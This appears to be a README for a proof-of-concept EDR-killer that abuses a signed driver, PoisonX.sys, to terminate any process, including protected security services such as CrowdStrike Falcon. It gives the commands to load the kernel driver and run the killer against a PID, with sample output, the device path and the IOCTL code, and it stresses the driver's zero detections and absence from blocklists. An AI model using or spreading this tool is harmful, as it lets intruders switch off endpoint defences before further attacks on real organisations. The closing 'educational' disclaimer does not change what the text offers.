Yet another POC for a kernel-mode process killer discovered during BYOVD research. Uses a signed Microsoft driver (PoisonX.sys) that exposes an IOCTL interface capable of terminating any process including PPL-protected EDR services like CrowdStrike Falcon.
0/71 detections on VirusTotal. Valid Microsoft signature. Not blocklisted.
Discovered by @j3h4ck
Full reverse engineering writeup, IDA analysis, and driver internals: Reverse Engineering a 0day used Against CrowdStrike EDR
Open a command prompt as Administrator and run:
sc create PoisonX type= kernel binPath= C:\full\path\to\PoisonX.sys
sc start PoisonXTo stop and remove it:
sc stop PoisonX
sc delete PoisonXPoisonKiller.exe <PID>Example:
PoisonKiller.exe 5140
[*] Target PID: 5140
[+] Device opened
[*] Sending kill command...
[*] Driver response: ok
[+] Process terminated| Property | Value |
|---|---|
| Device path | \\.\{F8284233-48F4-4680-ADDD-F8284233} |
| IOCTL | 0x22E010 |
| Signer | Microsoft Windows Hardware Compatibility Publisher |
| Sign date | 2025-03-25 |
For educational and research purposes only.